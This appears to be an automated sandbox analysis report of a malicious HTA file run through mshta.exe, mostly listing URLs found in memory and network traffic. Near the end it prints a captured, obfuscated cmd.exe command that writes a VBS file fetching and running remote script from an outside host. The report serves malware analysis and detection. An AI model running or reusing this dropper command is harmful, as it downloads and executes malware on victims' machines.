Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541754594.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510847946.00000000096C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/lojista/americanasg
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551427723.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12552919479.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556317603.000000000C052000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550560614.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579886236.000000000C052000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A9A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555082549.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550507328.000000000AB8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/marca/chandon
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/1343943570?chave=dk_hm_bn_4_7_oferta-o2o
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/5008766730?chave=dk_hm_bn_4_2_oferta-esporte
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/5271512690?chave=dk_hm_bn_4_4_oferta-portateis
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/60405799?chave=dk_hm_bn_4_1_oferta-perfume
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/7211551574?chave=dk_hm_bn_4_3_oferta-moda
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/7503637854?chave=dk_hm_bn_4_8_oferta-o2o
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12399712995.0000000006A6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12398747023.0000000006A6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12400556617.0000000006A6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12400278119.0000000006A6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12398278052.0000000006A6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12399330386.0000000006A6C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/7510984306?chave=dk_hm_bn_4_6_oferta-arvore
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396015997.0000000006A61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/produto/7510984342?chave=dk_hm_bn_4_5_oferta-led
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541572740.000000000A9F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574697469.0000000009646000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579079120.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542652490.0000000009645000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanasadvertising.com?utm_source=site_marcas_americanas&utm_medium=botao_footer&utm_
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551427723.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579079120.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556317603.000000000C052000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579886236.000000000C052000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555082549.000000000C051000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573530715.0000000009530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanasmarketplace.com.br/?epar=bo_tx_st_am_gw_footer_americanas&utm_source=americana
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12552919479.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550560614.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508266831.000000000AD51000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512233499.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579924983.000000000C0AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556081838.000000000C0AD000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.directlog.com.br/
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574697469.0000000009634000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516041915.0000000009630000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555261768.0000000009633000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12553033606.0000000009631000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.directlog.com.br/O87
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/5
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12401711671.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541515073.000000000953E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402284245.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402767156.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512134953.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12543390176.0000000006945000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573530715.0000000009530000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492009057.0000000006943000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WC
Source: mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PDFX6WCiesG
Source: mshta.exe, 00000001.00000003.11774937152.0000000006A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/static/service_worker/a.length
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567033771.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002ED0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570297373.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574697469.0000000009634000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516041915.0000000009630000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555261768.0000000009633000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12553033606.0000000009631000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.procon.rj.gov.br/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal76.evad.winHTA@17/50@10/4
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KA259YPD\gtm[1].jsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta"
